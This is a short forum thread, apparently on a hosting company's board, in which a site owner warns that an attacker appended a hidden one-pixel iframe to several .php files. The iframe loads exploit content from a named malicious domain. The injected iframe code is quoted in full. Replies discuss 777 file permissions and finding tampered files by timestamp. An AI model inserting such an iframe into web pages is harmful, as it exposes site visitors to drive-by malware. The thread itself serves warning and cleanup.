Announcement

Collapse
No announcement yet.

Site hacked

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Site hacked

    A warning for everyone - my website hosting (at 147.202.42.190) got hacked a couple of hours ago, and a number of .php files had the following appended:
    Code:
    <iframe width="1" height="1" src="http&#58;//step57.info/traff/index2.php" style="border&#58; 0;"></iframe>
    which links to a whole bunch of nasty java and malformed WMFs.

    Better check to see if you've been affected. (EUK, this means you too. )

  • #2
    This wont happen to us as we dont keep important files and folders with 777 permission. I had sorted this problem for one of our customer and it was lil bit difficult for me to find out which php file was injected by the Kiddie's.

    Finally I looked for the files which were included in the index page and one of the config files that was under includes was set 777 permission which allowed the Kid to inject his code at the bottom of the config file.
    eUKhost - eNlight Cloud Hosting || eUKhost Knowledgebase
    Toll Free : 0808 262 0255 || Skype : mark_ducadi

    Comment


    • #3
      Unfortunately some files do have to be set to 666/777 for scripts to save configuration data, such as a lot of forums, so it's not possible to lock down everything worse luck.

      If you've got the date/time of the attack, you should be able to find the affected files by checking their date stamp.

      Comment

      Working...
      X